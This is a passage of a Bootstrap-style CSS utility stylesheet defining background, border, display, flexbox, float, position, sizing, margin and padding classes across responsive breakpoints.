a.bg-warning:hover, a.bg-warning:focus,
button.bg-warning:hover,
button.bg-warning:focus {
  background-color: #d39e00 !important;
}

.bg-danger {
  background-color: #dc3545 !important;
}

a.bg-danger:hover, a.bg-danger:focus,
button.bg-danger:hover,
button.bg-danger:focus {
  background-color: #bd2130 !important;
}

.bg-light {
  background-color: #f8f9fa !important;
}

a.bg-light:hover, a.bg-light:focus,
button.bg-light:hover,
button.bg-light:focus {
  background-color: #dae0e5 !important;
}

.bg-dark {
  background-color: #343a40 !important;
}

a.bg-dark:hover, a.bg-dark:focus,
button.bg-dark:hover,
button.bg-dark:focus {
  background-color: #1d2124 !important;
}

.bg-white {
  background-color: #fff !important;
}

.bg-transparent {
  background-color: transparent !important;
}

.border {
  border: 1px solid #dee2e6 !important;
}

.border-top {
  border-top: 1px solid #dee2e6 !important;
}

.border-right {
  border-right: 1px solid #dee2e6 !important;
}

.border-bottom {
  border-bottom: 1px solid #dee2e6 !important;
}

.border-left {
  border-left: 1px solid #dee2e6 !important;
}

.border-0 {
  border: 0 !important;
}

.border-top-0 {
  border-top: 0 !important;
}

.border-right-0 {
  border-right: 0 !important;
}

.border-bottom-0 {
  border-bottom: 0 !important;
}

.border-left-0 {
  border-left: 0 !important;
}

.border-primary {
  border-color: #007bff !important;
}

.border-secondary {
  border-color: #6c757d !important;
}

.border-success {
  border-color: #28a745 !important;
}

.border-info {
  border-color: #17a2b8 !important;
}

.border-warning {
  border-color: #ffc107 !important;
}

.border-danger {
  border-color: #dc3545 !important;
}

.border-light {
  border-color: #f8f9fa !important;
}

.border-dark {
  border-color: #343a40 !important;
}

.border-white {
  border-color: #fff !important;
}

.rounded {
  border-radius: 0.25rem !important;
}

.rounded-top {
  border-top-left-radius: 0.25rem !important;
  border-top-right-radius: 0.25rem !important;
}

.rounded-right {
  border-top-right-radius: 0.25rem !important;
  border-bottom-right-radius: 0.25rem !important;
}

.rounded-bottom {
  border-bottom-right-radius: 0.25rem !important;
  border-bottom-left-radius: 0.25rem !important;
}

.rounded-left {
  border-top-left-radius: 0.25rem !important;
  border-bottom-left-radius: 0.25rem !important;
}

.rounded-circle {
  border-radius: 50% !important;
}

.rounded-0 {
  border-radius: 0 !important;
}

.clearfix::after {
  display: block;
  clear: both;
  content: "";
}

.d-none {
  display: none !important;
}

.d-inline {
  display: inline !important;
}

.d-inline-block {
  display: inline-block !important;
}

.d-block {
  display: block !important;
}

.d-table {
  display: table !important;
}

.d-table-row {
  display: table-row !important;
}

.d-table-cell {
  display: table-cell !important;
}

.d-flex {
  display: -webkit-box !important;
  display: -ms-flexbox !important;
  display: flex !important;
}

.d-inline-flex {
  display: -webkit-inline-box !important;
  display: -ms-inline-flexbox !important;
  display: inline-flex !important;
}

@media (min-width: 576px) {
  .d-sm-none {
    display: none !important;
  }
  .d-sm-inline {
    display: inline !important;
  }
  .d-sm-inline-block {
    display: inline-block !important;
  }
  .d-sm-block {
    display: block !important;
  }
  .d-sm-table {
    display: table !important;
  }
  .d-sm-table-row {
    display: table-row !important;
  }
  .d-sm-table-cell {
    display: table-cell !important;
  }
  .d-sm-flex {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
  }
  .d-sm-inline-flex {
    display: -webkit-inline-box !important;
    display: -ms-inline-flexbox !important;
    display: inline-flex !important;
  }
}

@media (min-width: 768px) {
  .d-md-none {
    display: none !important;
  }
  .d-md-inline {
    display: inline !important;
  }
  .d-md-inline-block {
    display: inline-block !important;
  }
  .d-md-block {
    display: block !important;
  }
  .d-md-table {
    display: table !important;
  }
  .d-md-table-row {
    display: table-row !important;
  }
  .d-md-table-cell {
    display: table-cell !important;
  }
  .d-md-flex {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
  }
  .d-md-inline-flex {
    display: -webkit-inline-box !important;
    display: -ms-inline-flexbox !important;
    display: inline-flex !important;
  }
}

@media (min-width: 992px) {
  .d-lg-none {
    display: none !important;
  }
  .d-lg-inline {
    display: inline !important;
  }
  .d-lg-inline-block {
    display: inline-block !important;
  }
  .d-lg-block {
    display: block !important;
  }
  .d-lg-table {
    display: table !important;
  }
  .d-lg-table-row {
    display: table-row !important;
  }
  .d-lg-table-cell {
    display: table-cell !important;
  }
  .d-lg-flex {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
  }
  .d-lg-inline-flex {
    display: -webkit-inline-box !important;
    display: -ms-inline-flexbox !important;
    display: inline-flex !important;
  }
}

@media (min-width: 1200px) {
  .d-xl-none {
    display: none !important;
  }
  .d-xl-inline {
    display: inline !important;
  }
  .d-xl-inline-block {
    display: inline-block !important;
  }
  .d-xl-block {
    display: block !important;
  }
  .d-xl-table {
    display: table !important;
  }
  .d-xl-table-row {
    display: table-row !important;
  }
  .d-xl-table-cell {
    display: table-cell !important;
  }
  .d-xl-flex {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
  }
  .d-xl-inline-flex {
    display: -webkit-inline-box !important;
    display: -ms-inline-flexbox !important;
    display: inline-flex !important;
  }
}

@media print {
  .d-print-none {
    display: none !important;
  }
  .d-print-inline {
    display: inline !important;
  }
  .d-print-inline-block {
    display: inline-block !important;
  }
  .d-print-block {
    display: block !important;
  }
  .d-print-table {
    display: table !important;
  }
  .d-print-table-row {
    display: table-row !important;
  }
  .d-print-table-cell {
    display: table-cell !important;
  }
  .d-print-flex {
    display: -webkit-box !important;
    display: -ms-flexbox !important;
    display: flex !important;
  }
  .d-print-inline-flex {
    display: -webkit-inline-box !important;
    display: -ms-inline-flexbox !important;
    display: inline-flex !important;
  }
}

.embed-responsive {
  position: relative;
  display: block;
  width: 100%;
  padding: 0;
  overflow: hidden;
}

.embed-responsive::before {
  display: block;
  content: "";
}

.embed-responsive .embed-responsive-item,
.embed-responsive iframe,
.embed-responsive embed,
.embed-responsive object,
.embed-responsive video {
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border: 0;
}

.embed-responsive-21by9::before {
  padding-top: 42.857143%;
}

.embed-responsive-16by9::before {
  padding-top: 56.25%;
}

.embed-responsive-4by3::before {
  padding-top: 75%;
}

.embed-responsive-1by1::before {
  padding-top: 100%;
}

.flex-row {
  -webkit-box-orient: horizontal !important;
  -webkit-box-direction: normal !important;
  -ms-flex-direction: row !important;
  flex-direction: row !important;
}

.flex-column {
  -webkit-box-orient: vertical !important;
  -webkit-box-direction: normal !important;
  -ms-flex-direction: column !important;
  flex-direction: column !important;
}

.flex-row-reverse {
  -webkit-box-orient: horizontal !important;
  -webkit-box-direction: reverse !important;
  -ms-flex-direction: row-reverse !important;
  flex-direction: row-reverse !important;
}

.flex-column-reverse {
  -webkit-box-orient: vertical !important;
  -webkit-box-direction: reverse !important;
  -ms-flex-direction: column-reverse !important;
  flex-direction: column-reverse !important;
}

.flex-wrap {
  -ms-flex-wrap: wrap !important;
  flex-wrap: wrap !important;
}

.flex-nowrap {
  -ms-flex-wrap: nowrap !important;
  flex-wrap: nowrap !important;
}

.flex-wrap-reverse {
  -ms-flex-wrap: wrap-reverse !important;
  flex-wrap: wrap-reverse !important;
}

.justify-content-start {
  -webkit-box-pack: start !important;
  -ms-flex-pack: start !important;
  justify-content: flex-start !important;
}

.justify-content-end {
  -webkit-box-pack: end !important;
  -ms-flex-pack: end !important;
  justify-content: flex-end !important;
}

.justify-content-center {
  -webkit-box-pack: center !important;
  -ms-flex-pack: center !important;
  justify-content: center !important;
}

.justify-content-between {
  -webkit-box-pack: justify !important;
  -ms-flex-pack: justify !important;
  justify-content: space-between !important;
}

.justify-content-around {
  -ms-flex-pack: distribute !important;
  justify-content: space-around !important;
}

.align-items-start {
  -webkit-box-align: start !important;
  -ms-flex-align: start !important;
  align-items: flex-start !important;
}

.align-items-end {
  -webkit-box-align: end !important;
  -ms-flex-align: end !important;
  align-items: flex-end !important;
}

.align-items-center {
  -webkit-box-align: center !important;
  -ms-flex-align: center !important;
  align-items: center !important;
}

.align-items-baseline {
  -webkit-box-align: baseline !important;
  -ms-flex-align: baseline !important;
  align-items: baseline !important;
}

.align-items-stretch {
  -webkit-box-align: stretch !important;
  -ms-flex-align: stretch !important;
  align-items: stretch !important;
}

.align-content-start {
  -ms-flex-line-pack: start !important;
  align-content: flex-start !important;
}

.align-content-end {
  -ms-flex-line-pack: end !important;
  align-content: flex-end !important;
}

.align-content-center {
  -ms-flex-line-pack: center !important;
  align-content: center !important;
}

.align-content-between {
  -ms-flex-line-pack: justify !important;
  align-content: space-between !important;
}

.align-content-around {
  -ms-flex-line-pack: distribute !important;
  align-content: space-around !important;
}

.align-content-stretch {
  -ms-flex-line-pack: stretch !important;
  align-content: stretch !important;
}

.align-self-auto {
  -ms-flex-item-align: auto !important;
  align-self: auto !important;
}

.align-self-start {
  -ms-flex-item-align: start !important;
  align-self: flex-start !important;
}

.align-self-end {
  -ms-flex-item-align: end !important;
  align-self: flex-end !important;
}

.align-self-center {
  -ms-flex-item-align: center !important;
  align-self: center !important;
}

.align-self-baseline {
  -ms-flex-item-align: baseline !important;
  align-self: baseline !important;
}

.align-self-stretch {
  -ms-flex-item-align: stretch !important;
  align-self: stretch !important;
}

@media (min-width: 576px) {
  .flex-sm-row {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: normal !important;
    -ms-flex-direction: row !important;
    flex-direction: row !important;
  }
  .flex-sm-column {
    -webkit-box-orient: vertical !important;
    -webkit-box-direction: normal !important;
    -ms-flex-direction: column !important;
    flex-direction: column !important;
  }
  .flex-sm-row-reverse {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: reverse !important;
    -ms-flex-direction: row-reverse !important;
    flex-direction: row-reverse !important;
  }
  .flex-sm-column-reverse {
    -webkit-box-orient: vertical !important;
    -webkit-box-direction: reverse !important;
    -ms-flex-direction: column-reverse !important;
    flex-direction: column-reverse !important;
  }
  .flex-sm-wrap {
    -ms-flex-wrap: wrap !important;
    flex-wrap: wrap !important;
  }
  .flex-sm-nowrap {
    -ms-flex-wrap: nowrap !important;
    flex-wrap: nowrap !important;
  }
  .flex-sm-wrap-reverse {
    -ms-flex-wrap: wrap-reverse !important;
    flex-wrap: wrap-reverse !important;
  }
  .justify-content-sm-start {
    -webkit-box-pack: start !important;
    -ms-flex-pack: start !important;
    justify-content: flex-start !important;
  }
  .justify-content-sm-end {
    -webkit-box-pack: end !important;
    -ms-flex-pack: end !important;
    justify-content: flex-end !important;
  }
  .justify-content-sm-center {
    -webkit-box-pack: center !important;
    -ms-flex-pack: center !important;
    justify-content: center !important;
  }
  .justify-content-sm-between {
    -webkit-box-pack: justify !important;
    -ms-flex-pack: justify !important;
    justify-content: space-between !important;
  }
  .justify-content-sm-around {
    -ms-flex-pack: distribute !important;
    justify-content: space-around !important;
  }
  .align-items-sm-start {
    -webkit-box-align: start !important;
    -ms-flex-align: start !important;
    align-items: flex-start !important;
  }
  .align-items-sm-end {
    -webkit-box-align: end !important;
    -ms-flex-align: end !important;
    align-items: flex-end !important;
  }
  .align-items-sm-center {
    -webkit-box-align: center !important;
    -ms-flex-align: center !important;
    align-items: center !important;
  }
  .align-items-sm-baseline {
    -webkit-box-align: baseline !important;
    -ms-flex-align: baseline !important;
    align-items: baseline !important;
  }
  .align-items-sm-stretch {
    -webkit-box-align: stretch !important;
    -ms-flex-align: stretch !important;
    align-items: stretch !important;
  }
  .align-content-sm-start {
    -ms-flex-line-pack: start !important;
    align-content: flex-start !important;
  }
  .align-content-sm-end {
    -ms-flex-line-pack: end !important;
    align-content: flex-end !important;
  }
  .align-content-sm-center {
    -ms-flex-line-pack: center !important;
    align-content: center !important;
  }
  .align-content-sm-between {
    -ms-flex-line-pack: justify !important;
    align-content: space-between !important;
  }
  .align-content-sm-around {
    -ms-flex-line-pack: distribute !important;
    align-content: space-around !important;
  }
  .align-content-sm-stretch {
    -ms-flex-line-pack: stretch !important;
    align-content: stretch !important;
  }
  .align-self-sm-auto {
    -ms-flex-item-align: auto !important;
    align-self: auto !important;
  }
  .align-self-sm-start {
    -ms-flex-item-align: start !important;
    align-self: flex-start !important;
  }
  .align-self-sm-end {
    -ms-flex-item-align: end !important;
    align-self: flex-end !important;
  }
  .align-self-sm-center {
    -ms-flex-item-align: center !important;
    align-self: center !important;
  }
  .align-self-sm-baseline {
    -ms-flex-item-align: baseline !important;
    align-self: baseline !important;
  }
  .align-self-sm-stretch {
    -ms-flex-item-align: stretch !important;
    align-self: stretch !important;
  }
}

@media (min-width: 768px) {
  .flex-md-row {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: normal !important;
    -ms-flex-direction: row !important;
    flex-direction: row !important;
  }
  .flex-md-column {
    -webkit-box-orient: vertical !important;
    -webkit-box-direction: normal !important;
    -ms-flex-direction: column !important;
    flex-direction: column !important;
  }
  .flex-md-row-reverse {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: reverse !important;
    -ms-flex-direction: row-reverse !important;
    flex-direction: row-reverse !important;
  }
  .flex-md-column-reverse {
    -webkit-box-orient: vertical !important;
    -webkit-box-direction: reverse !important;
    -ms-flex-direction: column-reverse !important;
    flex-direction: column-reverse !important;
  }
  .flex-md-wrap {
    -ms-flex-wrap: wrap !important;
    flex-wrap: wrap !important;
  }
  .flex-md-nowrap {
    -ms-flex-wrap: nowrap !important;
    flex-wrap: nowrap !important;
  }
  .flex-md-wrap-reverse {
    -ms-flex-wrap: wrap-reverse !important;
    flex-wrap: wrap-reverse !important;
  }
  .justify-content-md-start {
    -webkit-box-pack: start !important;
    -ms-flex-pack: start !important;
    justify-content: flex-start !important;
  }
  .justify-content-md-end {
    -webkit-box-pack: end !important;
    -ms-flex-pack: end !important;
    justify-content: flex-end !important;
  }
  .justify-content-md-center {
    -webkit-box-pack: center !important;
    -ms-flex-pack: center !important;
    justify-content: center !important;
  }
  .justify-content-md-between {
    -webkit-box-pack: justify !important;
    -ms-flex-pack: justify !important;
    justify-content: space-between !important;
  }
  .justify-content-md-around {
    -ms-flex-pack: distribute !important;
    justify-content: space-around !important;
  }
  .align-items-md-start {
    -webkit-box-align: start !important;
    -ms-flex-align: start !important;
    align-items: flex-start !important;
  }
  .align-items-md-end {
    -webkit-box-align: end !important;
    -ms-flex-align: end !important;
    align-items: flex-end !important;
  }
  .align-items-md-center {
    -webkit-box-align: center !important;
    -ms-flex-align: center !important;
    align-items: center !important;
  }
  .align-items-md-baseline {
    -webkit-box-align: baseline !important;
    -ms-flex-align: baseline !important;
    align-items: baseline !important;
  }
  .align-items-md-stretch {
    -webkit-box-align: stretch !important;
    -ms-flex-align: stretch !important;
    align-items: stretch !important;
  }
  .align-content-md-start {
    -ms-flex-line-pack: start !important;
    align-content: flex-start !important;
  }
  .align-content-md-end {
    -ms-flex-line-pack: end !important;
    align-content: flex-end !important;
  }
  .align-content-md-center {
    -ms-flex-line-pack: center !important;
    align-content: center !important;
  }
  .align-content-md-between {
    -ms-flex-line-pack: justify !important;
    align-content: space-between !important;
  }
  .align-content-md-around {
    -ms-flex-line-pack: distribute !important;
    align-content: space-around !important;
  }
  .align-content-md-stretch {
    -ms-flex-line-pack: stretch !important;
    align-content: stretch !important;
  }
  .align-self-md-auto {
    -ms-flex-item-align: auto !important;
    align-self: auto !important;
  }
  .align-self-md-start {
    -ms-flex-item-align: start !important;
    align-self: flex-start !important;
  }
  .align-self-md-end {
    -ms-flex-item-align: end !important;
    align-self: flex-end !important;
  }
  .align-self-md-center {
    -ms-flex-item-align: center !important;
    align-self: center !important;
  }
  .align-self-md-baseline {
    -ms-flex-item-align: baseline !important;
    align-self: baseline !important;
  }
  .align-self-md-stretch {
    -ms-flex-item-align: stretch !important;
    align-self: stretch !important;
  }
}

@media (min-width: 992px) {
  .flex-lg-row {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: normal !important;
    -ms-flex-direction: row !important;
    flex-direction: row !important;
  }
  .flex-lg-column {
    -webkit-box-orient: vertical !important;
    -webkit-box-direction: normal !important;
    -ms-flex-direction: column !important;
    flex-direction: column !important;
  }
  .flex-lg-row-reverse {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: reverse !important;
    -ms-flex-direction: row-reverse !important;
    flex-direction: row-reverse !important;
  }
  .flex-lg-column-reverse {
    -webkit-box-orient: vertical !important;
    -webkit-box-direction: reverse !important;
    -ms-flex-direction: column-reverse !important;
    flex-direction: column-reverse !important;
  }
  .flex-lg-wrap {
    -ms-flex-wrap: wrap !important;
    flex-wrap: wrap !important;
  }
  .flex-lg-nowrap {
    -ms-flex-wrap: nowrap !important;
    flex-wrap: nowrap !important;
  }
  .flex-lg-wrap-reverse {
    -ms-flex-wrap: wrap-reverse !important;
    flex-wrap: wrap-reverse !important;
  }
  .justify-content-lg-start {
    -webkit-box-pack: start !important;
    -ms-flex-pack: start !important;
    justify-content: flex-start !important;
  }
  .justify-content-lg-end {
    -webkit-box-pack: end !important;
    -ms-flex-pack: end !important;
    justify-content: flex-end !important;
  }
  .justify-content-lg-center {
    -webkit-box-pack: center !important;
    -ms-flex-pack: center !important;
    justify-content: center !important;
  }
  .justify-content-lg-between {
    -webkit-box-pack: justify !important;
    -ms-flex-pack: justify !important;
    justify-content: space-between !important;
  }
  .justify-content-lg-around {
    -ms-flex-pack: distribute !important;
    justify-content: space-around !important;
  }
  .align-items-lg-start {
    -webkit-box-align: start !important;
    -ms-flex-align: start !important;
    align-items: flex-start !important;
  }
  .align-items-lg-end {
    -webkit-box-align: end !important;
    -ms-flex-align: end !important;
    align-items: flex-end !important;
  }
  .align-items-lg-center {
    -webkit-box-align: center !important;
    -ms-flex-align: center !important;
    align-items: center !important;
  }
  .align-items-lg-baseline {
    -webkit-box-align: baseline !important;
    -ms-flex-align: baseline !important;
    align-items: baseline !important;
  }
  .align-items-lg-stretch {
    -webkit-box-align: stretch !important;
    -ms-flex-align: stretch !important;
    align-items: stretch !important;
  }
  .align-content-lg-start {
    -ms-flex-line-pack: start !important;
    align-content: flex-start !important;
  }
  .align-content-lg-end {
    -ms-flex-line-pack: end !important;
    align-content: flex-end !important;
  }
  .align-content-lg-center {
    -ms-flex-line-pack: center !important;
    align-content: center !important;
  }
  .align-content-lg-between {
    -ms-flex-line-pack: justify !important;
    align-content: space-between !important;
  }
  .align-content-lg-around {
    -ms-flex-line-pack: distribute !important;
    align-content: space-around !important;
  }
  .align-content-lg-stretch {
    -ms-flex-line-pack: stretch !important;
    align-content: stretch !important;
  }
  .align-self-lg-auto {
    -ms-flex-item-align: auto !important;
    align-self: auto !important;
  }
  .align-self-lg-start {
    -ms-flex-item-align: start !important;
    align-self: flex-start !important;
  }
  .align-self-lg-end {
    -ms-flex-item-align: end !important;
    align-self: flex-end !important;
  }
  .align-self-lg-center {
    -ms-flex-item-align: center !important;
    align-self: center !important;
  }
  .align-self-lg-baseline {
    -ms-flex-item-align: baseline !important;
    align-self: baseline !important;
  }
  .align-self-lg-stretch {
    -ms-flex-item-align: stretch !important;
    align-self: stretch !important;
  }
}

@media (min-width: 1200px) {
  .flex-xl-row {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: normal !important;
    -ms-flex-direction: row !important;
    flex-direction: row !important;
  }
  .flex-xl-column {
    -webkit-box-orient: vertical !important;
    -webkit-box-direction: normal !important;
    -ms-flex-direction: column !important;
    flex-direction: column !important;
  }
  .flex-xl-row-reverse {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: reverse !important;
    -ms-flex-direction: row-reverse !important;
    flex-direction: row-reverse !important;
  }
  .flex-xl-column-reverse {
    -webkit-box-orient: vertical !important;
    -webkit-box-direction: reverse !important;
    -ms-flex-direction: column-reverse !important;
    flex-direction: column-reverse !important;
  }
  .flex-xl-wrap {
    -ms-flex-wrap: wrap !important;
    flex-wrap: wrap !important;
  }
  .flex-xl-nowrap {
    -ms-flex-wrap: nowrap !important;
    flex-wrap: nowrap !important;
  }
  .flex-xl-wrap-reverse {
    -ms-flex-wrap: wrap-reverse !important;
    flex-wrap: wrap-reverse !important;
  }
  .justify-content-xl-start {
    -webkit-box-pack: start !important;
    -ms-flex-pack: start !important;
    justify-content: flex-start !important;
  }
  .justify-content-xl-end {
    -webkit-box-pack: end !important;
    -ms-flex-pack: end !important;
    justify-content: flex-end !important;
  }
  .justify-content-xl-center {
    -webkit-box-pack: center !important;
    -ms-flex-pack: center !important;
    justify-content: center !important;
  }
  .justify-content-xl-between {
    -webkit-box-pack: justify !important;
    -ms-flex-pack: justify !important;
    justify-content: space-between !important;
  }
  .justify-content-xl-around {
    -ms-flex-pack: distribute !important;
    justify-content: space-around !important;
  }
  .align-items-xl-start {
    -webkit-box-align: start !important;
    -ms-flex-align: start !important;
    align-items: flex-start !important;
  }
  .align-items-xl-end {
    -webkit-box-align: end !important;
    -ms-flex-align: end !important;
    align-items: flex-end !important;
  }
  .align-items-xl-center {
    -webkit-box-align: center !important;
    -ms-flex-align: center !important;
    align-items: center !important;
  }
  .align-items-xl-baseline {
    -webkit-box-align: baseline !important;
    -ms-flex-align: baseline !important;
    align-items: baseline !important;
  }
  .align-items-xl-stretch {
    -webkit-box-align: stretch !important;
    -ms-flex-align: stretch !important;
    align-items: stretch !important;
  }
  .align-content-xl-start {
    -ms-flex-line-pack: start !important;
    align-content: flex-start !important;
  }
  .align-content-xl-end {
    -ms-flex-line-pack: end !important;
    align-content: flex-end !important;
  }
  .align-content-xl-center {
    -ms-flex-line-pack: center !important;
    align-content: center !important;
  }
  .align-content-xl-between {
    -ms-flex-line-pack: justify !important;
    align-content: space-between !important;
  }
  .align-content-xl-around {
    -ms-flex-line-pack: distribute !important;
    align-content: space-around !important;
  }
  .align-content-xl-stretch {
    -ms-flex-line-pack: stretch !important;
    align-content: stretch !important;
  }
  .align-self-xl-auto {
    -ms-flex-item-align: auto !important;
    align-self: auto !important;
  }
  .align-self-xl-start {
    -ms-flex-item-align: start !important;
    align-self: flex-start !important;
  }
  .align-self-xl-end {
    -ms-flex-item-align: end !important;
    align-self: flex-end !important;
  }
  .align-self-xl-center {
    -ms-flex-item-align: center !important;
    align-self: center !important;
  }
  .align-self-xl-baseline {
    -ms-flex-item-align: baseline !important;
    align-self: baseline !important;
  }
  .align-self-xl-stretch {
    -ms-flex-item-align: stretch !important;
    align-self: stretch !important;
  }
}

.float-left {
  float: left !important;
}

.float-right {
  float: right !important;
}

.float-none {
  float: none !important;
}

@media (min-width: 576px) {
  .float-sm-left {
    float: left !important;
  }
  .float-sm-right {
    float: right !important;
  }
  .float-sm-none {
    float: none !important;
  }
}

@media (min-width: 768px) {
  .float-md-left {
    float: left !important;
  }
  .float-md-right {
    float: right !important;
  }
  .float-md-none {
    float: none !important;
  }
}

@media (min-width: 992px) {
  .float-lg-left {
    float: left !important;
  }
  .float-lg-right {
    float: right !important;
  }
  .float-lg-none {
    float: none !important;
  }
}

@media (min-width: 1200px) {
  .float-xl-left {
    float: left !important;
  }
  .float-xl-right {
    float: right !important;
  }
  .float-xl-none {
    float: none !important;
  }
}

.position-static {
  position: static !important;
}

.position-relative {
  position: relative !important;
}

.position-absolute {
  position: absolute !important;
}

.position-fixed {
  position: fixed !important;
}

.position-sticky {
  position: -webkit-sticky !important;
  position: sticky !important;
}

.fixed-top {
  position: fixed;
  top: 0;
  right: 0;
  left: 0;
  z-index: 1030;
}

.fixed-bottom {
  position: fixed;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1030;
}

@supports ((position: -webkit-sticky) or (position: sticky)) {
  .sticky-top {
    position: -webkit-sticky;
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}

.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  white-space: nowrap;
  -webkit-clip-path: inset(50%);
  clip-path: inset(50%);
  border: 0;
}

.sr-only-focusable:active, .sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  overflow: visible;
  clip: auto;
  white-space: normal;
  -webkit-clip-path: none;
  clip-path: none;
}

.w-25 {
  width: 25% !important;
}

.w-50 {
  width: 50% !important;
}

.w-75 {
  width: 75% !important;
}

.w-100 {
  width: 100% !important;
}

.h-25 {
  height: 25% !important;
}

.h-50 {
  height: 50% !important;
}

.h-75 {
  height: 75% !important;
}

.h-100 {
  height: 100% !important;
}

.mw-100 {
  max-width: 100% !important;
}

.mh-100 {
  max-height: 100% !important;
}

.m-0 {
  margin: 0 !important;
}

.mt-0,
.my-0 {
  margin-top: 0 !important;
}

.mr-0,
.mx-0 {
  margin-right: 0 !important;
}

.mb-0,
.my-0 {
  margin-bottom: 0 !important;
}

.ml-0,
.mx-0 {
  margin-left: 0 !important;
}

.m-1 {
  margin: 0.25rem !important;
}

.mt-1,
.my-1 {
  margin-top: 0.25rem !important;
}

.mr-1,
.mx-1 {
  margin-right: 0.25rem !important;
}

.mb-1,
.my-1 {
  margin-bottom: 0.25rem !important;
}

.ml-1,
.mx-1 {
  margin-left: 0.25rem !important;
}

.m-2 {
  margin: 0.5rem !important;
}

.mt-2,
.my-2 {
  margin-top: 0.5rem !important;
}

.mr-2,
.mx-2 {
  margin-right: 0.5rem !important;
}

.mb-2,
.my-2 {
  margin-bottom: 0.5rem !important;
}

.ml-2,
.mx-2 {
  margin-left: 0.5rem !important;
}

.m-3 {
  margin: 1rem !important;
}

.mt-3,
.my-3 {
  margin-top: 1rem !important;
}

.mr-3,
.mx-3 {
  margin-right: 1rem !important;
}

.mb-3,
.my-3 {
  margin-bottom: 1rem !important;
}

.ml-3,
.mx-3 {
  margin-left: 1rem !important;
}

.m-4 {
  margin: 1.5rem !important;
}

.mt-4,
.my-4 {
  margin-top: 1.5rem !important;
}

.mr-4,
.mx-4 {
  margin-right: 1.5rem !important;
}

.mb-4,
.my-4 {
  margin-bottom: 1.5rem !important;
}

.ml-4,
.mx-4 {
  margin-left: 1.5rem !important;
}

.m-5 {
  margin: 3rem !important;
}

.mt-5,
.my-5 {
  margin-top: 3rem !important;
}

.mr-5,
.mx-5 {
  margin-right: 3rem !important;
}

.mb-5,
.my-5 {
  margin-bottom: 3rem !important;
}

.ml-5,
.mx-5 {
  margin-left: 3rem !important;
}

.p-0 {
  padding: 0 !important;
}

.pt-0,
.py-0 {
  padding-top: 0 !important;
}

.pr-0,
.px-0 {
  padding-right: 0 !important;
}

.pb-0,
.py-0 {
  padding-bottom: 0 !important;
}

.pl-0,
.px-0 {
  padding-left: 0 !important;
}

.p-1 {
  padding: 0.25rem !important;
}

.pt-1,
.py-1 {
  padding-top: 0.25rem !important;
}

.pr-1,
.px-1 {
  padding-right: 0.25rem !important;
}

.pb-1,
.py-1 {
  padding-bottom: 0.25rem !important;
}

.pl-1,
.px-1 {
  padding-left: 0.25rem !important;
}

.p-2 {
  padding: 0.5rem !important;
}

.pt-2,
.py-2 {
  padding-top: 0.5rem !important;
}

.pr-2,
.px-2 {
  padding-right: 0.5rem !important;
}

.pb-2,
.py-2 {
  padding-bottom: 0.5rem !important;
}

.pl-2,
.px-2 {
  padding-left: 0.5rem !important;
}

.p-3 {
  padding: 1rem !important;
}

.pt-3,
.py-3 {
  padding-top: 1rem !important;
}

.pr-3,
.px-3 {
  padding-right: 1rem !important;
}

.pb-3,
.py-3 {
  padding-bottom: 1rem !important;
}

.pl-3,
.px-3 {
  padding-left: 1rem !important;
}

.p-4 {
  padding: 1.5rem !important;
}

.pt-4,
.py-4 {
  padding-top: 1.5rem !important;
}

.pr-4,
.px-4 {
  padding-right: 1.5rem !important;
}

.pb-4,
.py-4 {
  padding-bottom: 1.5rem !important;
}

.pl-4,
.px-4 {
  padding-left: 1.5rem !important;
}

.p-5 {
  padding: 3rem !important;
}

.pt-5,
.py-5 {
  padding-top: 3rem !important;
}

.pr-5,
.px-5 {
  padding-right: 3rem !important;
}

.pb-5,
.py-5 {
  padding-bottom: 3rem !important;
}

.pl-5,
.px-5 {
  padding-left: 3rem !important;
}

.m-auto {
  margin: auto !important;
}

.mt-auto,
.my-auto {
  margin-top: auto !important;
}

.mr-auto,
.mx-auto {
  margin-right: auto !important;
}

.mb-auto,
.my-auto {
  margin-bottom: auto !important;
}

.ml-auto,
.mx-auto {
  margin-left: auto !important;
}

@media (min-width: 576px) {
  .m-sm-0 {
    margin: 0 !important;
  }
  .mt-sm-0,
  .my-sm-0 {
    margin-top: 0 !important;
  }
  .mr-sm-0,
  .mx-sm-0 {
    margin-right: 0 !important;
  }
  .mb-sm-0,
  .my-sm-0 {
    margin-bottom: 0 !important;
  }
  .ml-sm-0,
  .mx-sm-0 {
    margin-left: 0 !important;
  }
  .m-sm-1 {
    margin: 0.25rem !important;
  }
  .mt-sm-1,
  .my-sm-1 {
    margin-top: 0.25rem !important;
  }
  .mr-sm-1,
  .mx-sm-1 {
    margin-right: 0.25rem !important;
  }
  .mb-sm-1,
  .my-sm-1 {
    margin-bottom: 0.25rem !important;
  }
  .ml-sm-1,
  .mx-sm-1 {
    margin-left: 0.25rem !important;
  }
  .m-sm-2 {
    margin: 0.5rem !important;
  }
  .mt-sm-2,
  .my-sm-2 {
    margin-top: 0.5rem !important;
  }
  .mr-sm-2,
  .mx-sm-2 {
    margin-right: 0.5rem !important;
  }
  .mb-sm-2,
  .my-sm-2 {
    margin-bottom: 0.5rem !important;
  }
  .ml-sm-2,
  .mx-sm-2 {
    margin-left: 0.5rem !important;
  }
  .m-sm-3 {
    margin: 1rem !important;
  }
  .mt-sm-3,
  .my-sm-3 {
    margin-top: 1rem !important;
  }
  .mr-sm-3,
  .mx-sm-3 {
    margin-right: 1rem !important;
  }
  .mb-sm-3,
  .my-sm-3 {
    margin-bottom: 1rem !important;
  }
  .ml-sm-3,
  .mx-sm-3 {
    margin-left: 1rem !important;
  }
  .m-sm-4 {
